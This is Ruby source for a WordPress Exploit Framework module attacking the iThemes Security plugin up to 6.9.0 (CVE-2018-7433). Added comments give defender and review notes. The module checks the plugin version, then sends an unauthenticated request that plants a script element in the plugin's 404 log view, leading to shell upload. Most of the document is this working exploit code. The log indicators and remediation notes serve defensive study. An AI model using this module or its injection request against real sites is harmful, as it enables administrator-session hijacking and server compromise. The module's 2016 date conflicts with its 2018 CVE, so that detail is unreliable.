class Wpxf::Exploit::IthemesSecurityV690StoredXssShellUpload
Public Class Methods
new()
Calls superclass method
Wpxf::WordPress::StoredXss::new
# File lib/wpxf/modules/exploit/xss/stored/ithemes_security_v6.9.0_stored_xss_shell_upload.rb, line 6
# Runs the superclass initializer, then registers this module's metadata
# (display name, authors, advisory references, date) through update_info.
#
# The references identify the issue for triage: WPVDB 9037 and CVE-2018-7433.
# The name states the affected range as iThemes Security <= 6.9.0.
def initialize
  super

  module_info = {
    name: 'iThemes Security <= 6.9.0 Unauthenticated Stored XSS Shell Upload',
    author: [
      'Paweł Kuryłowicz', # Disclosure
      'rastating'         # WPXF module
    ],
    references: [
      ['WPVDB', '9037'],
      ['CVE', '2018-7433']
    ],
    # NOTE(review): this date is earlier than the year in the CVE identifier
    # above; confirm which of the two the advisory actually supports.
    date: 'Oct 06 2016'
  }

  # Splatting keeps this a keyword-style call, same as writing the pairs inline.
  update_info(**module_info)
end
Public Instance Methods
check()
# File lib/wpxf/modules/exploit/xss/stored/ithemes_security_v6.9.0_stored_xss_shell_upload.rb, line 23
# Version check for the 'better-wp-security' plugin, delegated to
# check_plugin_version_from_readme.
#
# NOTE(review): '6.9.1' is presumably the first fixed release (the module
# file name targets v6.9.0); confirm against the advisory. For defenders the
# same comparison is the remediation test: an install reporting a lower
# version should be upgraded. The helper name suggests the version is read
# from the plugin readme, so a stale or removed readme may give a misleading
# answer - verify the installed version directly where it matters.
def check
  plugin_slug = 'better-wp-security'
  fixed_in_version = '6.9.1'
  check_plugin_version_from_readme(plugin_slug, fixed_in_version)
end
expected_status_code_after_store()
# File lib/wpxf/modules/exploit/xss/stored/ithemes_security_v6.9.0_stored_xss_shell_upload.rb, line 27
# HTTP status code expected in response to the store request.
#
# Returns 404: store_script asks for a random numeric post id, which
# presumably does not exist, so "Not Found" is the normal outcome here.
# Detection-wise, the relevant request therefore shows up as a 404, not as
# a 200 or a 5xx.
def expected_status_code_after_store
  404
end
store_script()
# File lib/wpxf/modules/exploit/xss/stored/ithemes_security_v6.9.0_stored_xss_shell_upload.rb, line 35
# Issues a single GET request whose query string carries a random numeric
# `p` value followed by a raw, unencoded <script> element.
#
# Defender notes:
# - The request is expected to return 404 (see
#   expected_status_code_after_store), so the indicator is a 404 access-log
#   entry whose query string contains a literal "<script>" after "?p=<digits>&".
# - vulnerable_page names "the 404 error logs" as the place where the stored
#   markup is rendered; presumably the plugin's 404 log view displayed the
#   requested URL without output encoding - confirm against the advisory.
# - Remediation is upgrading the plugin (check compares against 6.9.1) and
#   HTML-encoding any request data shown in admin log views.
def store_script
  base_uri = full_uri
  # NOTE(review): 11 is presumably the number of digits generated - confirm
  # against Wpxf::Utility::Text.rand_numeric.
  post_id = Wpxf::Utility::Text.rand_numeric(11)
  script_body = xss_include_script

  execute_get_request(url: "#{base_uri}?p=#{post_id}&<script>#{script_body}</script>")
end
vulnerable_page()
# File lib/wpxf/modules/exploit/xss/stored/ithemes_security_v6.9.0_stored_xss_shell_upload.rb, line 31
# Human-readable name of the admin view in which the stored markup is
# rendered: the plugin's 404 error logs.
#
# NOTE(review): presumably interpolated into operator-facing messages by the
# StoredXss base class - confirm against the superclass. For incident
# response this is the view to treat as untrusted until the plugin is
# upgraded and the logged entries are purged.
def vulnerable_page
  'the 404 error logs'
end